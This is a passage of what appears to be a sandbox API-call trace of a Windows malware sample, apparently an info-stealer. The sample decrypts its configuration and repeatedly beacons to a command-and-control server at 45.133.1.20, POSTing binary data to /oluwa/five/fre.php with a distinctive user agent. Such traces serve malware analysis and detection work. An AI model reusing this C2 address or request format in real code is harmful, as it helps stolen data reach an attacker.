(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0259.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.370] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0259.370] GetProcessHeap () returned 0x6a0000 [0259.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0259.370] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0259.370] GetProcessHeap () returned 0x6a0000 [0259.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0259.371] GetProcessHeap () returned 0x6a0000 [0259.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0259.371] GetProcessHeap () returned 0x6a0000 [0259.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0259.372] GetProcessHeap () returned 0x6a0000 [0259.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0259.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.373] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0259.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.379] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0259.390] GetProcessHeap () returned 0x6a0000 [0259.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0259.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.391] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0259.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.393] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0259.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.396] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.396] GetProcessHeap () returned 0x6a0000 [0259.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0259.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.398] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0259.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.400] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0259.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.402] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0259.402] GetProcessHeap () returned 0x6a0000 [0259.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0259.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.403] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0259.407] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.408] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0259.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.409] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0259.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.411] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0259.411] GetProcessHeap () returned 0x6a0000 [0259.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0259.411] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0259.411] GetProcessHeap () returned 0x6a0000 [0259.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0259.411] socket (af=2, type=1, protocol=6) returned 0x8cc [0259.412] connect (s=0x8cc, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0259.435] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0259.435] GetProcessHeap () returned 0x6a0000 [0259.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0259.435] GetProcessHeap () returned 0x6a0000 [0259.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0259.437] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0259.441] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0259.441] GetProcessHeap () returned 0x6a0000 [0259.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dcb18 [0259.441] GetProcessHeap () returned 0x6a0000 [0259.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0259.441] GetProcessHeap () returned 0x6a0000 [0259.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0259.441] GetProcessHeap () returned 0x6a0000 [0259.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0259.442] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0259.443] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0259.443] GetProcessHeap () returned 0x6a0000 [0259.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0259.444] GetProcessHeap () returned 0x6a0000 [0259.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0259.444] send (s=0x8cc, buf=0x6bd460*, len=242, flags=0) returned 242 [0259.445] send (s=0x8cc, buf=0x6bb998*, len=159, flags=0) returned 159 [0259.445] GetProcessHeap () returned 0x6a0000 [0259.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0259.445] recv (in: s=0x8cc, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0259.529] GetProcessHeap () returned 0x6a0000 [0259.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0259.530] GetProcessHeap () returned 0x6a0000 [0259.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0259.532] GetProcessHeap () returned 0x6a0000 [0259.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcb18 | out: hHeap=0x6a0000) returned 1 [0259.533] GetProcessHeap () returned 0x6a0000 [0259.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0259.533] closesocket (s=0x8cc) returned 0 [0259.534] GetProcessHeap () returned 0x6a0000 [0259.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0259.534] GetProcessHeap () returned 0x6a0000 [0259.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0259.535] GetProcessHeap () returned 0x6a0000 [0259.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0259.535] GetProcessHeap () returned 0x6a0000 [0259.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0259.536] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x160c) returned 0x8cc [0259.538] Sleep (dwMilliseconds=0xea60) [0259.540] GetProcessHeap () returned 0x6a0000 [0259.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0259.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.543] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0259.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.554] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0259.566] GetProcessHeap () returned 0x6a0000 [0259.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0259.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.595] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0259.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.596] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0259.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.597] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.597] GetProcessHeap () returned 0x6a0000 [0259.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0259.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.601] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0259.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.602] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0259.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.604] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0259.604] GetProcessHeap () returned 0x6a0000 [0259.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0259.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.605] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0259.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.606] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0259.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.610] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0259.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.611] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0259.611] GetProcessHeap () returned 0x6a0000 [0259.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0259.612] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0259.612] GetProcessHeap () returned 0x6a0000 [0259.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0259.613] GetProcessHeap () returned 0x6a0000 [0259.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0259.613] GetProcessHeap () returned 0x6a0000 [0259.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0259.614] GetProcessHeap () returned 0x6a0000 [0259.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0259.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.615] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0259.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.624] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0259.635] GetProcessHeap () returned 0x6a0000 [0259.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0259.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.636] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0259.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.638] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0259.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.639] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.639] GetProcessHeap () returned 0x6a0000 [0259.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0259.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.642] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0259.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.644] CryptDestroyKey (hKey=0x6ad020) returned 1 [0259.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.645] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0259.645] GetProcessHeap () returned 0x6a0000 [0259.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0259.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.646] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0259.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.647] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0259.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.648] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0259.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.650] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0259.650] GetProcessHeap () returned 0x6a0000 [0259.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0259.650] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0259.650] GetProcessHeap () returned 0x6a0000 [0259.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0259.650] socket (af=2, type=1, protocol=6) returned 0x8d0 [0259.650] connect (s=0x8d0, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0259.675] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0259.676] GetProcessHeap () returned 0x6a0000 [0259.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0259.676] GetProcessHeap () returned 0x6a0000 [0259.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0259.677] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0259.678] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0259.678] GetProcessHeap () returned 0x6a0000 [0259.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dce18 [0259.678] GetProcessHeap () returned 0x6a0000 [0259.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0259.678] GetProcessHeap () returned 0x6a0000 [0259.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0259.679] GetProcessHeap () returned 0x6a0000 [0259.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0259.679] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0259.680] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0259.680] GetProcessHeap () returned 0x6a0000 [0259.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0259.680] GetProcessHeap () returned 0x6a0000 [0259.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0259.681] send (s=0x8d0, buf=0x6bd460*, len=242, flags=0) returned 242 [0259.681] send (s=0x8d0, buf=0x6bb998*, len=159, flags=0) returned 159 [0259.682] GetProcessHeap () returned 0x6a0000 [0259.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0259.682] recv (in: s=0x8d0, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0259.756] GetProcessHeap () returned 0x6a0000 [0259.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0259.756] GetProcessHeap () returned 0x6a0000 [0259.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0259.757] GetProcessHeap () returned 0x6a0000 [0259.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dce18 | out: hHeap=0x6a0000) returned 1 [0259.757] GetProcessHeap () returned 0x6a0000 [0259.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0259.758] closesocket (s=0x8d0) returned 0 [0259.759] GetProcessHeap () returned 0x6a0000 [0259.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0259.759] GetProcessHeap () returned 0x6a0000 [0259.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0259.761] GetProcessHeap () returned 0x6a0000 [0259.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0259.761] GetProcessHeap () returned 0x6a0000 [0259.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0259.762] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1610) returned 0x8d0 [0259.764] Sleep (dwMilliseconds=0xea60) [0259.766] GetProcessHeap () returned 0x6a0000 [0259.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0259.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.767] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0259.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.777] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0259.790] GetProcessHeap () returned 0x6a0000 [0259.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9fc8 [0259.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.794] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b9fc8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0259.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.799] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0259.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.800] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.800] GetProcessHeap () returned 0x6a0000 [0259.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9fc8 | out: hHeap=0x6a0000) returned 1 [0259.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.801] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0259.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.803] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0259.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.804] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0259.804] GetProcessHeap () returned 0x6a0000 [0259.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0259.805] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.805] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0259.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.807] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0259.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.808] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0259.809] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.809] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0259.809] GetProcessHeap () returned 0x6a0000 [0259.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0259.809] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", 